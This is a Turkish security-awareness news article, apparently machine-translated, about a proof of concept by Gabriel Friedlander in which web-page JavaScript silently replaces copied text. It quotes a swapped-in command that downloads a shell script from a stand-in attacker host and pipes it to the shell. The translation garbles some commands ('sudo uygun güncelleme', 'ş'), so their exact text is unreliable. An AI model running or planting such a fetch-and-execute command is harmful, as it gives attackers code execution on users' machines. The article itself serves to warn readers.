Web sayfalarından komutları bir konsola veya terminale kopyalayıp yapıştıran programcılar, sistem yöneticileri, güvenlik araştırmacıları ve teknoloji meraklıları, sistemlerinin tehlikeye girme riskiyle karşı karşıya oldukları konusunda uyarılır.
Bir teknoloji uzmanı, web sayfalarından metin kopyalayıp yapıştırmadan önce iki kez düşünmenizi sağlayacak basit bir numara gösteriyor.
Panonuzdaki arka kapı mı?
Son zamanlarda, güvenlik bilinci eğitim platformu Wizer’in kurucusu Gabriel Friedlander, web sayfalarından komutları kopyalayıp yapıştırma konusunda dikkatli olmanızı sağlayacak bariz ama şaşırtıcı bir hack gösterdi.
Acemi ve yetenekli geliştiriciler için yaygın olarak kullanılan komutları bir web sayfasından (ahem, StackOverflow) kopyalayıp uygulamalarına, bir Windows komut istemine veya bir Linux terminaline yapıştırmak alışılmadık bir durum değildir.
Ancak Friedlander, bir web sayfasının panonuzdaki içeriğin gizlice değiştirilebileceği ve aslında panonuza kopyalanan şeyin, kopyalamayı amaçladığınızdan çok farklı olacağı konusunda uyarıyor.
Daha da kötüsü, gerekli özen gösterilmeden, geliştirici ancak metni yapıştırdıktan sonra hatasını fark edebilir ve bu noktada çok geç olabilir.
Friedlander, blogunda yayınlanan basit bir kavram kanıtında (PoC) okuyuculardan basit bir komutu kopyala çoğu sistem yöneticisinin ve geliştiricinin aşina olduğu:
Şimdi, Friedlander’ın blogundan kopyaladığınız şeyi bir metin kutusuna veya Not Defteri’ne yapıştırın ve sonuç sizi şaşırtabilir:
curl http://attacker-domain:8000/shell.sh | ş
Panonuzda yalnızca tamamen farklı bir komut almakla kalmaz, aynı zamanda işleri daha da kötüleştirmek için sonunda bir yeni satır (veya dönüş) karakteri bulunur.
Bu, yukarıdaki örneğin doğrudan bir Linux terminaline yapıştırıldığı anda yürütüleceği anlamına gelir.
Metni yapıştıranlar, tanıdık, zararsız komutu kopyaladıkları izlenimi edinmiş olabilirler. sudo uygun güncelleme sisteminizde yüklü olan yazılımlarla ilgili güncel bilgileri almak için kullanılır.
Ama tam olarak böyle olmadı.
Buna ne sebep olur?
Sihir, Friedlander tarafından PoC HTML sayfa kurulumunun arkasına gizlenmiş JavaScript kodundadır.
“sudo uygun güncelleme” bir HTML öğesinde bulunan metin, aşağıda gösterilen kod parçacığı çalışır.
Daha sonra ne olur bir JavaScript ‘olay dinleyicisi‘ kopyalama olayını yakalamak ve pano verilerini Friedlander’ın kötü niyetli test koduyla değiştirmek:
Olay dinleyicilerinin JavaScript’te çeşitli meşru kullanım durumları olduğunu unutmayın, ancak bu, bunların nasıl kötüye kullanılabileceğinin yalnızca bir örneğidir.
Friedlander, “Bu nedenle, yapıştır komutlarını ASLA doğrudan terminalinize kopyalamamalısınız” diye uyarıyor.
“Bir şeyi kopyaladığınızı düşünüyorsunuz, ancak bunun yerine kötü amaçlı kod gibi başka bir şey geliyor. Tek yapmanız gereken, uygulamanıza bir arka kapı oluşturmak için kopyaladığınız koda tek bir kod satırı eklemek.”
“Bu saldırı çok basit ama aynı zamanda çok zararlı.”
Günlük güvenlik konusunda basit ama yine de önemli bir ders.